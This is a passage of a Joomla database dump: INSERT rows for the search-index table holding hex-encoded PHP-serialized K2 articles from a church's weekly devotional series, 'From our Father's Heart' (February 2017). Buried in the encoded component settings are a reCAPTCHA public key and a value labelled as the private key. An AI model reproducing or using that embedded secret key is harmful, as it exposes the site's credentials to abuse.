5f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2238223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2232363a66726f6d2d6f75722d6661746865722d732d68656172742d31392d30322d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f32362d66726f6d2d6f75722d6661746865722d732d68656172742d31392d30322d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3236223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32363a66726f6d2d6f75722d6661746865722d732d68656172742d31392d30322d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202831392f30322f3230313729223b733a31313a226465736372697074696f6e223b733a3336343a2220446561726c792042656c6f7665642c204a6f686e2031303a20342d35207361797320e2809c20416e64207768656e206865207075747465746820666f72746820686973206f776e2073686565702c20686520676f657468206265666f7265207468656d2c20616e642074686520736865657020666f6c6c6f772068696d3a20666f722074686579206b6e6f772068697320766f6963652e20416e64206120737472616e6765722077696c6c2074686579206e6f7420666f6c6c6f772c206275742077696c6c20666c65652066726f6d2068696d3a20666f722074686579206b6e6f77206e6f742074686520766f696365206f6620737472616e676572732e20596f757220736563757269747920616e642073616665747920696e20323031372077696c6c20626520646570656e64656e74206f6e20686f77206d756368206f6620476f64e280997320766f69636520796f752063616e207265636f676e697a6520616e64206f6265792e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30322d31392031393a30393a3237223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30322d31392031393a30393a3237223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(259, 'index.php?option=com_k2&view=item&id=27', 'index.php?option=com_k2&view=item&id=27:from-our-father-s-heart-26-02-2017', 'From our Father\'s Heart (26/02/2017)', ' Dearly beloved of God, Let your training in the Dream Centre become your habits. What habits are you cultivating in your life? The habits you allow to grow and fester in your life will determine where you arrive in your destiny journey. Your habits are vehicles that determine where you eventually end up in life and destiny. Let your training in the Dream Centre become your habit. ', '2017-06-25 14:19:35', '84517a8271693d62efffdf841843113e', 1, 1, 1, '*', '2017-02-26 17:49:27', '0000-00-00 00:00:00', '2017-02-26 17:49:27', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223237223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d32362d30322d32303137223b733a373a2273756d6d617279223b733a3430313a223c703e446561726c792062656c6f766564206f6620476f642cc2a03c2f703e0d0a3c703e4c657420796f757220747261696e696e6720696e2074686520447265616d2043656e747265206265636f6d6520796f7572206861626974732e2057686174206861626974732061726520796f752063756c7469766174696e6720696e20796f7572206c6966653f205468652068616269747320796f7520616c6c6f7720746f2067726f7720616e642066657374657220696e20796f7572206c6966652077696c6c2064657465726d696e6520776865726520796f752061727269766520696e20796f75722064657374696e79206a6f75726e65792e20596f757220686162697473206172652076656869636c657320746861742064657465726d696e6520776865726520796f75206576656e7475616c6c7920656e6420757020696e206c69666520616e642064657374696e792e204c657420796f757220747261696e696e6720696e2074686520447265616d2043656e747265206265636f6d6520796f75722068616269742e3c2f703e0d0a223b733a343a22626f6479223b733a323339393a220d0a3c703e546865204c6f72642068617320746f6c6420757320746861742074686520447265616d2043656e747265206973206e6f74206a7573742061206368757263682c2074686520447265616d2043656e74726520697320747261696e696e672e205468657265666f726520796f75206d757374206265636f6d65206120636f6e7363696f7573206c6561726e657220616e642074616b6520747261696e696e6720736572696f75732ec2a03c2f703e0d0a3c703e54686520626573742077617920746f2067657420746865206d6f7374206f6620796f757220747261696e696e6720696e2074686520686f75736520697320746f207472616e736c61746520796f757220747261696e696e6720746f20796f7572206861626974732e2054686520616c6c2d6e6967687420747261696e696e67732c20746865207072617965722070726f6772616d7320616e64207363686564756c652c20746865206162696c69747920746f2073697420646f776e20616e64206c697374656e206163746976656c7920616e6420696e74656e746c7920746f20736f756e64207465616368696e672069732061696d6564206174206275696c64696e6720696e6372656173656420636170616369747920696e20796f7572206c69666520616e6420697320737570706f73656420746f206265636f6d6520612070617274206f6620796f7572206461696c79206c696665207374796c652e2054686520726561736f6e20666f7220796f7572207365656d6c7920746f75676820747261696e696e672069732062656361757365206f66207468652064657374696e7920616e642061737369676e6d656e74206f6620476f642068616e67696e67206f6e20796f7572206c69666520616e6420796f752063616e6e6f74206166666f726420746f20626520636172656c657373207769746820796f757220747261696e696e672e20596f75206d757374207472616e736c61746520747261696e696e6720696e746f2068616269742e20416e797468696e6720796f7520646f20636f6e73697374656e746c7920666f72207477656e7479206f6e652064617973206265636f6d657320796f75722068616269742e2041646f70742074686520706f7369746976652068616269747320616e64206c65742069742062652070617274206f6620796f7572206c6966652e20496e20736f20646f696e6720796f7520776f756c64206265207365637572696e672074686520677265617420667574757265207468617420476f64206861732070726573657276656420666f7220796f7520696e2064657374696e792ec2a03c2f703e0d0a3c703e427265616b2062616420616e64206e656761746976652068616269747320616e64206c65742074686520486f6c79205370697269742068656c7020796f752062656361757365207468652062616420616e64206e656761746976652068616269747320796f7520646f206e6f7420636865636b20616e6420627265616b206e6f772077696c6c2067726f77206f7574206f662068616e6420696e746f20737472616e67652073696e732c20746861742077696c6c206c696d697420686f772065666665637469766520616e642072656c6576616e7420796f752077696c6c20626520696e20746865207465727261696e206f6620796f75722064657374696e792e2049206861766520616c7761797320746f6c6420796f7520746861742074686520646576696c206973206120736d617274206669676874657220616e64206973206c6f6f6b696e6720666f7220686f7720746f206d616b6520796f7520756e66697420616e6420706f7765726c657373207768656e20796f7520636f6e66726f6e742068696d20696e2074686520706c616365206f6620796f757220707572706f736520696e20476f642e20446f206e6f742066616c6c20666f72207468652064656d6f6e6963206c6965206f662074686520646576696c2074686174206d616b657320796f75206665656c732074686174207468652064656d616e6473206f6620747261696e696e672061726520746f6f206d75636820666f7220796f752c20646f6ee2809974207065616b20746f6f20736f6f6e2e2041766f69642070656f706c652077686f206d616b6520796f75206665656c2074686174207468652064656d616e64732061726520746f6f206d7563682ec2a03c2f703e0d0a3c703e52656d656d626572207468617420747261696e696e67206d69676874206e6f74206265207377656574207768656e20796f752061726520676f696e67207468726f7567682c20686f77657665722074686520737472656e6774682c2063686172616374657220616e642076616c7565206974206164647320746f20796f7572206c6966652069732062656175746966756c20746f206265686f6c64207768656e20796f7520737461727420746f2066756e6374696f6e20696e20796f75722064657374696e792e205468657265206172652070656f706c652077686f2074727920746f206573636170652066726f6d20747261696e696e6720616e6420636f6d706c61696e20696e2074686520706c616365206f6620747261696e696e672c206f6e6c7920746f20726567726574206c61746572207768656e20746865207375627374616e6365207468617420697320737570706c69656420696e2074686520706c616365206f6620747261696e696e67206973206265696e672064656d616e646564206f66207468656d20616e6420746865792066696e6420697420646966666963756c7420746f2070726f647563652e20c2a05472616e736c61746520796f757220747261696e696e6720696e746f206861626974732c20627265616b2062616420616e64206e656761746976652068616269747320626563617573652064656d6f6e69632066726f6e74732061637475616c6c7920616476616e6365207468726f75676820756e62726f6b656e206e65676174697665206861626974732068656e63652c20726f6262696e6720796f75206f6620796f75722066757475726520696e20476f642e3c2f703e0d0a3c703ec2a04d617920796f75206e6f7420776173746520646976696e6520747261696e696e6720616e64207072657061726174696f6e2ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732073657276616e742c3c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30332d30352030383a33383a3131223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22